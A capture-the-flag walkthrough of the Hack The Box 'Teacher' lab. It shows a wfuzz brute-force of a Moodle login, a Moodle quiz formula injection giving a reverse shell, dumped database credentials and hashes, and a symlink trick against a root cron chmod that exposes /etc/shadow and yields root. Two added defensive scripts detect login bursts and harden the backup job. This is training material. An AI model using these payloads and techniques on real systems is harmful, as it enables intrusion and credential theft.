HTB - Teacher

Getting Root:

Nmap:

# Nmap 7.80 scan initiated Thu Mar 26 22:11:59 2020 as: nmap -sC -sV -p 80 -oA nmap/Teacher 10.10.10.153
Nmap scan report for 10.10.10.153
Host is up (0.066s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:12:09 2020 -- 1 IP address (1 host up) scanned in 10.53 seconds

Enumeration:

Dirsearch

dirsearch -u http://10.10.10.153/moodle -E                                                                                                               
[sudo] password for kali:                                                                                                                                                                     
                                                                                                                                                                                              
 _|. _ _  _  _  _ _|_    v0.3.9                                                                                                                                                               
(_||| _) (/_(_|| (_| )                                                                                                                                                                        
                                                                                                                                                                                              
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8674                                                                                  
                                                                                                                                                                                              
Error Log: /opt/dirsearch/logs/errors-20-04-15_01-12-16.log                                                                                                                                   
                                                                                                                                                                                              
Target: http://10.10.10.153/moodle                                                                                                                                                            
                                                                                                                                                                                              
[01:12:16] Starting:                                                                                                                                                                          
[01:12:17] 200 -    2KB - /moodle/.eslintignore                                                                                                                                               
[01:12:17] 200 -    7KB - /moodle/.eslintrc                                                                                                                                                   
[01:12:17] 200 -  180B  - /moodle/.gitattributes                                                                                                                                              
[01:12:17] 403 -  298B  - /moodle/.hta                                                                                                                                                        
[01:12:17] 403 -  305B  - /moodle/.ht_wsr.txt                                                                                                                                                 
[01:12:17] 403 -  309B  - /moodle/.htaccess-local                                                                                                                                             
[01:12:17] 403 -  307B  - /moodle/.htaccess-dev                                                                                                                                               
[01:12:17] 403 -  309B  - /moodle/.htaccess-marco                                                                                                                                             
[01:12:17] 403 -  307B  - /moodle/.htaccess.BAK                                                                                                                                               
[01:12:17] 403 -  308B  - /moodle/.htaccess.bak1                                                                                                                                              
[01:12:17] 403 -  307B  - /moodle/.htaccess.old                                                                                                                                               
[01:12:17] 403 -  308B  - /moodle/.htaccess.orig                                                                                                                                              
[01:12:17] 403 -  310B  - /moodle/.htaccess.sample                                                                                                                                            
[01:12:17] 403 -  308B  - /moodle/.htaccess.save                                                                                                                                              
[01:12:17] 403 -  307B  - /moodle/.htaccess.txt                                                                                                                                               
[01:12:17] 403 -  309B  - /moodle/.htaccess_extra                                                                                                                                             
[01:12:17] 403 -  308B  - /moodle/.htaccess_orig                                                                                                                                              
[01:12:17] 403 -  306B  - /moodle/.htaccess_sc                                                                                                                                                
[01:12:17] 403 -  306B  - /moodle/.htaccessBAK                                                                                                                                                
[01:12:17] 403 -  306B  - /moodle/.htaccessOLD                                                                                                                                                
[01:12:17] 403 -  307B  - /moodle/.htaccessOLD2                                                                                                                                               
[01:12:17] 403 -  304B  - /moodle/.htaccess~                                                                                                                                                  
[01:12:17] 403 -  302B  - /moodle/.htgroup                                                                                                                                                    
[01:12:17] 403 -  307B  - /moodle/.htpasswd-old                                                                                                                                               
[01:12:17] 403 -  308B  - /moodle/.htpasswd_test
[01:12:17] 403 -  304B  - /moodle/.htpasswds
[01:12:17] 403 -  302B  - /moodle/.htusers
[01:12:17] 200 -    2KB - /moodle/.jshintrc
[01:12:18] 200 -    9KB - /moodle/.travis.yml
[01:12:21] 301 -  319B  - /moodle/admin  ->  http://10.10.10.153/moodle/admin/
[01:12:21] 403 -  309B  - /moodle/admin/.htaccess
[01:12:22] 303 -  448B  - /moodle/admin/
[01:12:22] 303 -  448B  - /moodle/admin/?/login
[01:12:22] 303 -  448B  - /moodle/admin/index.php
[01:12:31] 301 -  318B  - /moodle/auth  ->  http://10.10.10.153/moodle/auth/
[01:12:31] 200 -    0B  - /moodle/auth/
[01:12:31] 301 -  320B  - /moodle/backup  ->  http://10.10.10.153/moodle/backup/
[01:12:31] 200 -    4KB - /moodle/backup/
[01:12:32] 301 -  320B  - /moodle/blocks  ->  http://10.10.10.153/moodle/blocks/
[01:12:32] 301 -  318B  - /moodle/blog  ->  http://10.10.10.153/moodle/blog/
[01:12:32] 301 -  319B  - /moodle/cache  ->  http://10.10.10.153/moodle/cache/
[01:12:32] 200 -    3KB - /moodle/cache/
[01:12:32] 301 -  322B  - /moodle/calendar  ->  http://10.10.10.153/moodle/calendar/
[01:12:33] 301 -  321B  - /moodle/comment  ->  http://10.10.10.153/moodle/comment/
[01:12:33] 200 -  374B  - /moodle/composer.json
[01:12:33] 200 -  115KB - /moodle/composer.lock
[01:12:33] 200 -  747B  - /moodle/config.php.save
[01:12:34] 200 -    0B  - /moodle/config.php
[01:12:36] 301 -  319B  - /moodle/error  ->  http://10.10.10.153/moodle/error/
[01:12:37] 301 -  319B  - /moodle/files  ->  http://10.10.10.153/moodle/files/
[01:12:37] 303 -  440B  - /moodle/files/
[01:12:37] 301 -  319B  - /moodle/group  ->  http://10.10.10.153/moodle/group/
[01:12:38] 200 -   14KB - /moodle/Gruntfile.js
[01:12:39] 200 -   26KB - /moodle/index.php
[01:12:39] 200 -   26KB - /moodle/index.php/login/
[01:12:39] 301 -  321B  - /moodle/install  ->  http://10.10.10.153/moodle/install/
[01:12:39] 302 -    0B  - /moodle/install.php  ->  admin/index.php?lang=en
[01:12:39] 200 -  664B  - /moodle/INSTALL.txt
[01:12:39] 200 -    2KB - /moodle/install/
[01:12:40] 301 -  318B  - /moodle/lang  ->  http://10.10.10.153/moodle/lang/
[01:12:40] 301 -  317B  - /moodle/lib  ->  http://10.10.10.153/moodle/lib/
[01:12:40] 301 -  319B  - /moodle/local  ->  http://10.10.10.153/moodle/local/
[01:12:40] 200 -    1KB - /moodle/local/
[01:12:41] 301 -  319B  - /moodle/login  ->  http://10.10.10.153/moodle/login/
[01:12:41] 200 -   27KB - /moodle/login/
[01:12:42] 301 -  319B  - /moodle/media  ->  http://10.10.10.153/moodle/media/
[01:12:44] 200 -  649B  - /moodle/package.json
[01:12:45] 200 -    8KB - /moodle/phpunit.xml.dist
[01:12:45] 301 -  317B  - /moodle/pix  ->  http://10.10.10.153/moodle/pix/
[01:12:46] 200 -    1KB - /moodle/README.txt
[01:12:46] 301 -  320B  - /moodle/report  ->  http://10.10.10.153/moodle/report/
[01:12:47] 301 -  317B  - /moodle/rss  ->  http://10.10.10.153/moodle/rss/
[01:12:47] 301 -  320B  - /moodle/search  ->  http://10.10.10.153/moodle/search/
[01:12:50] 301 -  317B  - /moodle/tag  ->  http://10.10.10.153/moodle/tag/
[01:12:50] 301 -  319B  - /moodle/theme  ->  http://10.10.10.153/moodle/theme/
[01:12:51] 301 -  318B  - /moodle/user  ->  http://10.10.10.153/moodle/user/

Inspecting the source

Clicking on the highlighted links does nothing at all.

Looking closely at the source, we notice something odd about images/5.png.

From the browser console, we can see that every time we click on a link the message "That's an F" shows up.

Checking the image at http://10.10.10.153/images, we can see it doesn't follow the naming convention of the other images. Let's download it.

Inspecting the image shows that it is actually text:

# Download it with wget
wget http://10.10.10.153/images/5.png


# Checking the file
file 5.png 
5.png: ASCII text


# Contents
cat 5.png 
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.  

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

It seems we might be able to log in somewhere using the username Giovanni, as long as we can figure out the last character of the password and find the login page.

From the output of gobuster, we can see it found /moodle; checking it out shows a page where we can possibly log in. We can also notice the user Giovanni Chhatta.

Guessing the Password with Burp

Captured the login POST request and sent it to Intruder.

I used the following payload list from SecLists: /usr/share/seclists/Fuzzing/special-chars.txt. Burp shows a hit for the # character.

This can also be done using wfuzz

wfuzz -L --hh 27142 -w /usr/share/seclists/Fuzzing/special-chars.txt -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://10.10.10.153/moodle/login/index.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 32

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000004:   200        296 L    1258 W   27575 Ch    "#"

Total time: 3.765820
Processed Requests: 32
Filtered Requests: 31
Requests/sec.: 8.497483

Now we are going to try to log in to the web application as:

Username: giovanni Password: Th4C00lTheacha#
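From the defender's side, the wfuzz run above is 32 POSTs to /moodle/login/index.php in under four seconds, which stands out in the Apache access log regardless of the spoofed User-Agent. The following is an added example, not part of the original walkthrough, that counts login POSTs per client and per minute over constructed sample log lines (the client addresses and timestamps are made up; only the Moodle path and the 27142-byte failed-login page size come from the page):

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag a password-guessing burst
# against the Moodle login form in Apache combined-format access log lines.
set -eu

LOGIN_PATH='/moodle/login/index.php'
LIMIT=10   # more POSTs than this from one client in one minute is flagged

# Read access-log lines on stdin; print "client count" for every client that
# exceeded LIMIT POSTs to the login form within a single clock minute.
flag_login_bursts() {
    awk -v path="$LOGIN_PATH" -v limit="$LIMIT" '
        # combined format: $1 client, $4 [day/mon/year:hh:mm:ss, $6 "METHOD, $7 path
        $6 == "\"POST" && $7 == path {
            minute = substr($4, 2, 17)      # e.g. 21/Apr/2020:17:51
            hits[$1 " " minute]++
        }
        END {
            for (key in hits)
                if (hits[key] > limit) {
                    split(key, f, " ")
                    print f[1], hits[key]
                }
        }'
}

# Constructed sample log, not captured traffic: 12 login POSTs from one
# client inside one minute (every reply the 27142-byte failed-login page),
# plus an ordinary browse-and-login from a second client.
sample_log() {
    i=1
    while [ "$i" -le 12 ]; do
        printf '10.10.14.9 - - [21/Apr/2020:17:51:%02d +0000] "POST %s HTTP/1.1" 200 27142 "-" "Mozilla/5.0"\n' "$i" "$LOGIN_PATH"
        i=$((i + 1))
    done
    printf '10.10.14.22 - - [21/Apr/2020:17:52:10 +0000] "GET %s HTTP/1.1" 200 27142 "-" "Mozilla/5.0"\n' "$LOGIN_PATH"
    printf '10.10.14.22 - - [21/Apr/2020:17:52:15 +0000] "POST %s HTTP/1.1" 303 440 "-" "Mozilla/5.0"\n' "$LOGIN_PATH"
}

# Number of flagged clients in the constructed sample (used as a self-check).
flagged_count() { sample_log | flag_login_bursts | wc -l; }
```

Pipe a real access log into flag_login_bursts to run it against live data; lowering LIMIT or widening the window is a matter of adjusting the two constants.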

Exploit

We log in to Moodle and turn editing on so that we can add a Quiz, as described in the exploit PoC referenced above. The injected formula is:

 /*{a*/`$_GET[0]`;//{x}}

Used netcat to catch the reverse shell:

rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:33758.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The following database credentials were found in /var/www/html/moodle/config.php:

www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8mb4_unicode_ci',
);

$CFG->wwwroot   = 'http://10.10.10.153/moodle';
$CFG->dataroot  = '/var/www/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

Got the password hashes for user giovanni from the database:

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
5 rows in set (0.00 sec)

MariaDB [(none)]> 

+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

MariaDB [moodle]> 

Cracked the MD5 hash of the Giovannibak entry:

Hash                                Type    Result
7a860966115182402ed06375cf0a22af    md5    expelled

Now we can switch to the user giovanni with that password:

www-data@teacher:/var/www/html/moodle$ su - giovanni
su - giovanni
Password: expelled

giovanni@teacher:~$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
giovanni@teacher:~$

Privilege Escalation

There is a directory called work, and some of the files under it are owned by root:

giovanni@teacher:~$ find . -ls
find . -ls
  1055165      4 drwxr-x---   4 giovanni giovanni     4096 Nov  4  2018 .
  1055175      4 drwxrwxrwx   2 giovanni giovanni     4096 Jun 27  2018 ./.nano
  1055166      4 -rw-r--r--   1 giovanni giovanni      220 Jun 27  2018 ./.bash_logout
  1048578      4 -rw-------   1 giovanni giovanni        1 Nov  4  2018 ./.bash_history
  1055158      4 -rw-r--r--   1 giovanni giovanni       33 Jun 27  2018 ./user.txt
  1055167      4 -rw-r--r--   1 giovanni giovanni     3526 Jun 27  2018 ./.bashrc
  1055168      4 -rw-r--r--   1 giovanni giovanni      675 Jun 27  2018 ./.profile
  1048592      4 drwxr-xr-x   4 giovanni giovanni     4096 Jun 27  2018 ./work
  1055164      4 drwxr-xr-x   3 giovanni giovanni     4096 Jun 27  2018 ./work/tmp
  1055172      4 drwxrwxrwx   3 root     root         4096 Jun 27  2018 ./work/tmp/courses
  1055178      4 drwxrwxrwx   2 root     root         4096 Jun 27  2018 ./work/tmp/courses/algebra
  1048590      4 -rwxrwxrwx   1 giovanni giovanni      109 Jun 27  2018 ./work/tmp/courses/algebra/answersAlgebra
  1055171      4 -rwxrwxrwx   1 root     root          256 Apr 21 21:22 ./work/tmp/backup_courses.tar.gz
  1055163      4 drwxr-xr-x   3 giovanni giovanni     4096 Jun 27  2018 ./work/courses
  1055162      4 drwxr-xr-x   2 root     root         4096 Jun 27  2018 ./work/courses/algebra
  1055169      4 -rw-r--r--   1 giovanni giovanni      109 Jun 27  2018 ./work/courses/algebra/answersAlgebra

Using pspy64 shows that a root cron job is creating a backup of the courses directory, changing directory to tmp, extracting the archive there and then recursively setting rwx for everyone on all files:

2020/04/21 17:50:37 CMD: UID=0    PID=1      | /sbin/init 
2020/04/21 17:51:01 CMD: UID=0    PID=1257   | /usr/sbin/CRON -f 
2020/04/21 17:51:01 CMD: UID=0    PID=1258   | /usr/sbin/CRON -f 
2020/04/21 17:51:01 CMD: UID=0    PID=1259   | /bin/sh -c /usr/bin/backup.sh 
2020/04/21 17:51:01 CMD: UID=0    PID=1260   | /bin/bash /usr/bin/backup.sh 
2020/04/21 17:51:01 CMD: UID=0    PID=1261   | tar -czvf tmp/backup_courses.tar.gz courses/algebra 
2020/04/21 17:51:01 CMD: UID=0    PID=1262   | gzip 
2020/04/21 17:51:01 CMD: UID=0    PID=1263   | /bin/bash /usr/bin/backup.sh 
2020/04/21 17:51:01 CMD: UID=0    PID=1264   | tar -xf backup_courses.tar.gz 
2020/04/21 17:51:01 CMD: UID=0    PID=1265   | /bin/bash /usr/bin/backup.sh 

Contents of /usr/bin/backup.sh:

#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

The chmod runs as root on a glob inside a directory giovanni owns, so a symlink planted there ends up on its command line and is followed:

giovanni@teacher:~/work/tmp$ ln -s /etc wtf
giovanni@teacher:~/work/tmp$ ls -la
total 16
drwxr-xr-x 3 giovanni giovanni 4096 Apr 22 00:01 .
drwxr-xr-x 4 giovanni giovanni 4096 Jun 27  2018 ..
-rwxrwxrwx 1 root     root      256 Apr 22 00:01 backup_courses.tar.gz
drwxrwxrwx 3 root     root     4096 Apr 22 00:00 courses
lrwxrwxrwx 1 giovanni giovanni    4 Apr 22 00:01 wtf -> /etc
giovanni@teacher:~/work/tmp$ 

# I have read, write and execute access to the shadow file
giovanni@teacher:~/work/tmp$ ls -la wtf/shadow
-rwxrwxrwx 1 root shadow 961 Jun 27  2018 wtf/shadow
giovanni@teacher:~/work/tmp$ 


# Reading the file
giovanni@teacher:~/work/tmp$ cat wtf/shadow
cat wtf/shadow
root:$6$j801WLZh$Gm3artvmHU6m4zOtHM5/cEejF4mJ.Ctvf2rNlP.z/30gzsykgbCMQmZLr3vfAXzRhp5v3CHorU.giSaqVXdi/0:17709:0:99999:7:::
daemon:*:17708:0:99999:7:::
bin:*:17708:0:99999:7:::
sys:*:17708:0:99999:7:::
sync:*:17708:0:99999:7:::
games:*:17708:0:99999:7:::
man:*:17708:0:99999:7:::
lp:*:17708:0:99999:7:::
mail:*:17708:0:99999:7:::
news:*:17708:0:99999:7:::
uucp:*:17708:0:99999:7:::
proxy:*:17708:0:99999:7:::
www-data:*:17708:0:99999:7:::
backup:*:17708:0:99999:7:::
list:*:17708:0:99999:7:::
irc:*:17708:0:99999:7:::
gnats:*:17708:0:99999:7:::
nobody:*:17708:0:99999:7:::
systemd-timesync:*:17708:0:99999:7:::
systemd-network:*:17708:0:99999:7:::
systemd-resolve:*:17708:0:99999:7:::
systemd-bus-proxy:*:17708:0:99999:7:::
_apt:*:17708:0:99999:7:::
messagebus:*:17708:0:99999:7:::
sshd:*:17708:0:99999:7:::
mysql:!:17708:0:99999:7:::
giovanni:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::  
giovanni@teacher:~/work/tmp$ 

I edited the shadow file and used the same hash as giovanni

giovanni@teacher:~/work/tmp$ su -
Password: expelled
root@teacher:~# id
uid=0(root) gid=0(root) groups=0(root)
root@teacher:~# 
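The root cause of this escalation is a privileged cron job doing a recursive chmod over a user-writable tree with a glob, so the user-planted wtf symlink lands on chmod's command line and is followed (the -rwxrwxrwx on wtf/shadow above confirms it). The following is an added example, not the box's backup.sh, showing an audit for symlinks that escape a tree plus a replacement job that cannot be steered out of it. It assumes GNU coreutils (realpath -m, stat -c); the sandbox directories, file contents and shadow line are constructed stand-ins:

```shell
#!/bin/sh
# Added example (not from the box): audit and hardened replacement for a
# root backup job that ran "chmod 777 * -R" in a user-owned directory.
set -eu

# Build a throwaway stand-in for the box: $1/tmp plays ~/work/tmp,
# $1/outside plays /etc, $1/out is the root-owned archive location,
# and the user has planted the symlink. All contents are constructed.
make_sandbox() {
    mkdir -p "$1/tmp/courses/algebra" "$1/outside" "$1/out"
    echo 'x^2 = 4' > "$1/tmp/courses/algebra/answersAlgebra"
    echo 'root:*:17709:0:99999:7:::' > "$1/outside/shadow"
    chmod 600 "$1/outside/shadow"
    ln -s "$1/outside" "$1/tmp/wtf"
}

# Count symlinks under $1 whose target resolves outside $1 (0 means clean).
count_escaping_links() {
    root=$(realpath -- "$1")
    find "$root" -type l -exec sh -c '
        root=$1; shift
        for link; do
            case "$(realpath -m -- "$link")/" in
                "$root"/*) ;;                 # stays inside the tree
                *) printf "%s\n" "$link" ;;   # escapes: report it
            esac
        done' sh "$root" {} + | wc -l
}

# Replacement for the "chmod 777 * -R" step: find never follows symlinks,
# -type d / -type f skip the links themselves, and nobody gets 777.
safe_chmod() {
    find "$1" -mindepth 1 -type d -exec chmod 750 {} +
    find "$1" -mindepth 1 -type f -exec chmod 640 {} +
}

# Replacement for backup.sh: refuse a tree containing an escaping link,
# archive into $2 (a directory the user cannot write), then fix modes.
safe_backup() {
    if [ "$(count_escaping_links "$1")" -ne 0 ]; then
        echo "refusing to back up $1: a symlink points outside the tree" >&2
        return 1
    fi
    tar -czf "$2/backup_courses.tar.gz" -C "$1" courses
    safe_chmod "$1"
}

# Octal mode of a file, used to verify what the job touched.
mode_of() { stat -c %a -- "$1"; }
```

Running the real fix is also a placement question: a root job should not operate inside a directory the user owns at all, which is why safe_backup writes its archive elsewhere.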